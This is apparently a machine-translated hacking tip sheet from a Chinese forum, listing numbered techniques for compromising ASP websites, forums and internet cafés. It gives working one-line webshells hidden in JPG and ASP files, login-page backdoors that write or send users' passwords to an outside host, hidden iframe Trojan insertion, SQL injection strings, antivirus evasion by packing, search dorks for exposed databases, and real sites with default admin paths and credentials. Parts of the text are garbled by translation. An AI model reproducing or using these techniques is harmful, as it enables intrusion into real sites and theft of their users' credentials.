1. Name: How to make picture ASP Trojan Horse (can display picture)
Build an ASP file, content for <!--#i nclude file= "Ating.jpg"-->
Find a normal picture ating.jpg, insert a word trojan (such as Ice Fox), with UltraEdit Hex compiled, inserted in the picture, for
Run successfully, but also search <% and%>, turn it into 00, (Do not replace your ASP's), and then add the JPG file to the beginning
<script runat=server Language=javascript>eval (Request.Form (#) +) </SCRIPT>
2. Name: Tricky Internet café
First use the Elite Internet access tool to get user name and password, and then use Computer Management to connect a machine, open telnet, connect, open share,
Copy a Trojan past run can.
3. Name: Feelings MD5 the charm of violent cracking
Rainbowcrack Usage Rtgen Build library first Rtgen MD5 byte 1 7 5 2400 All "
1 and 7 represent the minimum and maximum length of the password
Attin I add a way: http://md5.rednoize.com/online crack
or to Http://www.md5lookup.com/?category=01-3&;searck=on.
4. Many times we do not kill the Trojan, do not understand the assembly, with the Beidou shell program can escape, there are many shell software, we trojan Shell
, it's best to choose an unknown shell-adding software
5. Name: Hidden insert Type ASP Trojan
(1) Add the following content to the ASP file we want to tamper with
<%if Request ("action") = "OK" then%>
The shell code is inserted here, preferably a pony, but also to encrypt the
<%end if%>
When you visit the ASP file with your hands and feet after adding a action=ok, you can
(2) Another method, in our to tamper with the ASP file to add the following content
<%
On Error Resume Next
strFileName = Request.QueryString ("filer")
Set objstream = Server.CreateObject ("Abodb. Stream ")
objStream.Type = 1
objStream.Open
objStream.LoadFromFile strFileName
Objstream.savetofile Server.MapPath ("ating.asp"), 2
%>
When you visit the ASP file behind the tamper with? filer=xxx
XXX for your local upload of a path such as c:ating123.asp
Ating,asp in the same folder as the ASP that was rigged after uploading
(3) The prerequisite obtains system authority,
Go to the next level of the site Directory
mkdir s ...
Copy ating.asp s.../
So the anti-virus software can not find
Visit http://website/s.../ating.asp can
6. Tool Http://hack520.tengyi.cn/chaojiyonghu.rar, this tool generates a Superuser user name in this computer:
Hack password 110, in DOS and computer Manager can not see the user you created, and is not deleted
7. Name: QQ Group script attack
Open the QQ dialog con, copy the message, and then
The following content is saved as a. vbs file and can be run
Set wshshell= wscript.createobject ("Wscript.Shell")
Wshshell.appactivate "QQ Information attack script"
For I=1 to 20
Wscript.Sleep 1000
Wshshell.sendkeys "^v"
Wshshell.sendkeys I
Wshshell.sendkeys '%s '
Next
8. Search: Program production: Wan Peng have free application space, directly upload ASP horse can
9. Name: Fully find your station on the ASP Trojan
(1) with anti-virus software
(2) Use FTP client software, point "tool"-> "Compare Folder"
(3) with asplist2.0.asp upload to the site space view, the general function of ASP I estimate is ASP Trojan
(4) Beyond Compare with tools
10 Name: Expand the mind to take the Dvbbs account "a person's bible" animation
(1) before getting Webshell want to enter the background of Dvbbs, want the administrator password, you can
Old
Modify admin_login.asp get plaintext Dvbbs background password
After the Username=trim (replace request ("username") line
Dim Fsoobject
Dim Tsobject
Set fsoobject = Server.CreateObject ("Scripting.FileSystemObject")
Set tsobject = Fsoobject.createtextfile (Server.MapPath ("Laner.txt"))
Tsobject.write CStr (Request ("password"))
Set fsoobject = Nothing
Set tsobject = Nothing
As long as the administrator log in the background, in the directory generated Laner.txt
(2) Login.asp in the case "Login_chk":
On Error Resume Next
Dim Rain
Set Rain=server.createobject ("ADODB.stream")
Rain. type=2
Rain. charset= "gb2312"
Rain. Position=rain. Size
Rain. Open
Rain. LoadFromFile server. MapPath ("laner.asp")
Rain.writetext now&request ("username") & "Text:" &request ("password") &CHR (10)
Rain. SaveToFile server. MapPath ("laner.asp"), 2
Rain. Close
Set rain=nothing
So laner.asp will get the login time, username and password of all the landing.
(3) If you have your own website or another Webshell (strongly recommended):
You can create a directory laner that creates an empty laner.asp and a rain.asp of the following code:
<%if request ("n") <> "" and Request ("P") <> "" Then
On Error Resume Next
Dim Rain
Set Rain=server.createobject ("ADODB.stream")
Rain. type=2
Rain. charset= "gb2312"
Rain. Position=rain. Size
Rain. Open
Rain. LoadFromFile server. MapPath ("laner.asp")
Rain.writetext now& "Name:" &request ("n") & "Password:" &request ("P") &CHR (10)
Rain. SaveToFile server. MapPath ("laner.asp"), 2
Rain. Close
Set rain=nothing
End If%>
11. Name: Use QQ online state to catch pigeon broiler
Generate QQ Online status, change the inside address into a Trojan address, sent to the forum
Insert a sentence in Login.asp:
Response.Write "<scriptsrc=http://www.ptlushi.com/laner/rain.asp?n=" &request ("username")
& "" & "&p=" &request ("password") & "></script>"
Response.Write "<iframesrc=http://yourwebsite/laner/rain.asp?n=" &request ("username")
& "" & "&p=" &request ("password") & "></iframe>"
As a result, all the landings are going to send their names and passwords to your laner.asp.
12. Animation Name: Media China Whole-station program has many loopholes
Vulnerability program: Media China Whole station procedure (first edition)
Official website: http://meiti.elgod.com/
Vulnerability:%5c (Bauku) Upload injection
Upload page: down1/upload.asp
13. Name: Free telephone +msh command line tool
http://www.globe7.com/Open the homepage, click the sit down corner, free DownLoad, download to local, install,
After running, you will be prompted to find the area code for your region. Because it is international long-distance, register an account number, send 100 cents, domestic timing
0.01/, you'll have 100 minutes to play in vain. is an account number OH.
Note that the fixed telephone, PHS form of 0086521123456 521 originally 0521, to omit the preceding 0, mobile phone number is also
is the same.
14. Name: Bo-blog's new loophole
http://URL/index.php?job=. /admin/ban
Put "no search word" that part <table> save, the address of the inside to complete, insert a word trojan
15. Name: Hook Soul Intruder
Search legend Inurl:tuku with Baidu
or legendary inurl:wplm.htm.
or the legendary inurl:coolsites.asp.
Links in the link to insert a word trojan can
16. Procedure: HTC Enterprise entire station uploads the flaw
Official homepage: http://www.mu126.com/
Vulnerability page:/cx/upfile.asp (Upload vulnerability)
17. Or=or mailbox, in the password change, username and password add
18. Name: bbsxp5.16 Backstage Get Webshell
bbsxp5.16 filter asp,asp,cdx,cer, extension of the file upload, is in the basic settings added to the upload type is not good, and prohibited
Stop the modification of data backup data name, we can save this page in the local, change source code upload.
19. Name: JHACKJ 2005 Latest Classic Tutorial
Download and see, yes, all major sites have
20. Name: Labor-saving invasion of Korean broiler
In AH D's scan injection point entry, open this: Http://www.google.co.kr/advanced_search?hl=zh-CN
This is the advanced search term, the keyword is casually written. Here I write asp?name= set to show 100 for each page.
The language chooses the Korean language. Search, many SAS.
21. Name: The management system of any internet café cracked
Select the Smart ABC, then VV input, the cursor back two steps, press the DELETE key just entered the two VV delete
Finally press Inter key
22. Name: Crack QQ Space Insert webpage Trojan code
Now Tencent has sealed a lot of QQ space code as before <iframe src= "Trojan address" name= "LCX" width= "0"
height= "0" frameborder= "0" ></iframe> Insert the Trojan code is already sealed.
Break through the Disabled method code as follows:
<div id=di>
Marginwidth=0 marginheight=0 hspace=0 vspace=0 frameborder=0 scrolling=no></iframe>\ "
Style=display:none></div>
Finally attached Kara is a OK summary
1. Upload a vulnerability [not much to say]
PS: If you see: Select the file you want to upload [upload] or appear "Please login after use", 80% there are loopholes!
Sometimes uploads are not necessarily successful, because cookies are different. We're going to use Wsockexpert to get cookies. And then upload it in domain.
2. Injection holes [Not much]
PS: MD5 password. Sometimes we are not easy to run out. If this is a [SQL database]. Then we can use the following command:
http://inject url; update admin set password=\ new MD5 password \ Where password=\ old MD5 password \--
[Admin is the table name.]
3. Side note, that is, Cross station.
When we invade a station, this station may be strong and airtight, we can find the site and this station the same server, and then in the use of this
Site with the right, sniffing and other methods to invade the site we want to invade. , here is a difficult point, is that some of the server's absolute path through
Encryption, it depends on our ability
4. Bauku: The middle of the Level two catalogue/replace%5C
Ey:http://www.ahttc.edu.cn/otherweb/dz/bgs/bigclass.asp?bigclassname= Responsibility Scope &bigclasstype=1
If you can see: \e:ahttc040901otherwebdzdatabaseixuer_studio.asa\ is not a valid path. OK road
The correct spelling of the path name and whether to connect to the server where the file is stored.
This is the database. You can use FlashGet to change to. mdb format when downloading.
5.\or\=\or\ This is a phrase that can be connected to SQL. You can go directly to the background. I collected it. There are also similar:
\or\\=\ "or" a "=" a \) or (\a\=\a ") or (" a "=" a "or 1=1--\ or \a\=\a
6. Social engineering. We all know that. is to guess the solution.
Ey:http://www.neu.edu.cn/waishi/admin
Admin Waishi
7. Write to ASP format database. is a word trojan [<%execute request ("value")%>], commonly used in the message book.
Ey:http://www.ahsdxy.ah.edu.cn/ebook/db/ebook.asp[This is the ASP format database], and then write a word
Trojan
8. Source code use: Some sites are used to download the source of the Internet. Some stationmaster is very vegetable. Nothing is changed.
Ey:http://www.ahsdxy.ah.edu.cn/xiaoyoulu/index.asp
This station uses is: Outstanding alumni, the source code I have been down,
Default database/webshell path: Databaseliangu_data.mdb admin: adm_login.asp passwords and user names are
Admin
9. Default database/webshell Path utilization: A lot of such sites/benefits people webshell others.
/databackup/dvbbs7. Mdb
/bbs/databackup/dvbbs7. Mdb
/bbs/data/dvbbs7. Mdb
/data/dvbbs7.mdb
/bbs/diy.asp
/diy.asp
/bbs/cmd.asp
/bbs/cmd.exe
/bbs/s-u.exe
/bbs/servu.exe
Tools: Website Hunter digging Chicken
Ey:http://www.cl1999.com/bbs/databackup/dvbbs7.mdb
10. View the table of contents method: Some people can disconnect the directory, you can ask the directory.
ey:http://www.ujs168.com/shop/admin/
http://escolourfvl.com/babyfox/admin/%23bb%23dedsed2s/
So we can find the database, download I don't have to teach it
11. Tool overflow:. asp? Newsid=/2j.asp?id=18. asp?id=[This method can make a lot of Webshell]
12. Search Engine Utilization:
(1). inurl:flasher_list.asp default database: Database/flash.mdb background/manager/
(2). Look for the admin background address of the website:
Site:xxxx.comintext: Management
Site:xxxx.comintitle: Management < Keywords a lot, self find >
Site:xxxx.cominurl:login
(3). Find the database for access, MSSQL, MySQL connection files
Allinurl:bbsdata
Filetype:mdbinurl:database
Filetype:incconn
Inurl:datafiletype:mdb
My lord won't do it. Do it yourself.
13.COOKIE Spoofing: Change your ID to admin's, MD5 password is also changed to his, with the Guilin Veterans tool can modify cookies.
I'm not going to tell you that.
14. Use common vulnerabilities: such as moving the network BBS
Ey:http://js1011.com/bbs/index.asp
You can use: Dvbbs privilege Promotion tool to make yourself a front desk administrator.
THEN, use: Move net headspace stick tool, find a headspace paste, obtain cookies again, this wants you to do yourself. We can use Wsockexpert.
Get COOKIES/NC Bag
I will not do this, the online tutorial is more, since the next look.
Tools: Dvbbs Privilege lifting tool headspace stick tool
15. There are still some old loopholes. such as iis3,4 view Source, 5 Delete
Cgi,php some of the old holes, I will not say ah ... It's too old. There is no big use.
